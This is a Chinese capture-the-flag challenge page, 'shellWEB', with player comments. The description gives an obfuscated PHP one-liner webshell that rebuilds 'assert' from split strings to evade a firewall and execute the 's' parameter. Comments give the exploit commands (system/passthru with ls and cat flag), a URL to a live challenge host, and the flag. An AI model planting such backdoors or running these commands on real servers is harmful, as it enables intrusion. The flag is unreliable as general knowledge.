shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 7103
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
04secbug 2年前

s=system('ls') s=system('cat flag')

回复 1

JJhello 2年前

rnm,退钱

回复 2

wxy1343 2年前

flag{5104494e7b5ec21c02e3d1c5985a4e89}

回复 0

wxy1343 2年前

http://114.67.175.224:11167/index.php?s=passthru(%27cat%20flaga15808abee46a1d5.txt%27)

回复 0

我爱你制杖 2年前

注意描述,explode为分搁符。绕来绕去就是:assert($_GET['s'])

回复 1

xclay 2年前

这题告诉我们,学什么渗透,直接猜开发者留下的接口就可以了

回复 4

2224525664 2年前

没有提示的话这题是不是就做不出来了?

回复 1

Miludear 2年前

不懂语法的可直接参考 https://blog.csdn.net/changer_we/article/details/89304399 大佬的文章,很不错,简单易懂!

回复 2

zmcck 2年前

assert(s) ?s=system("ls") ?s=system("cat flag***.txt")

回复 0

17695688750 2年前

命令执行漏洞,我以为s和url间隔要用/隔开,没想到要用?隔开,淦

回复 0

WriteUp

image
harry

3 金币

评分(10)

解题动态

zz0607 攻破了该题 18分钟前
巴咕噜182 攻破了该题 2小时前
yang0000 攻破了该题 15小时前
chi 攻破了该题 21小时前
四叠半神话大系 攻破了该题 21小时前
11223 攻破了该题 23小时前
aboic 攻破了该题 1天前
YYYYHHHHNNNN 攻破了该题 1天前
chenwei001 攻破了该题 1天前
zzuer 攻破了该题 1天前
巧屿 攻破了该题 1天前
彭彭 攻破了该题 1天前
demonsong 攻破了该题 1天前
awesome 攻破了该题 2天前
star_evil 攻破了该题 2天前
JKyukino 攻破了该题 2天前
wwwwjjj 攻破了该题 2天前
daimaojiang 攻破了该题 2天前
jaaa 攻破了该题 2天前
18754065892 攻破了该题 2天前
问题反馈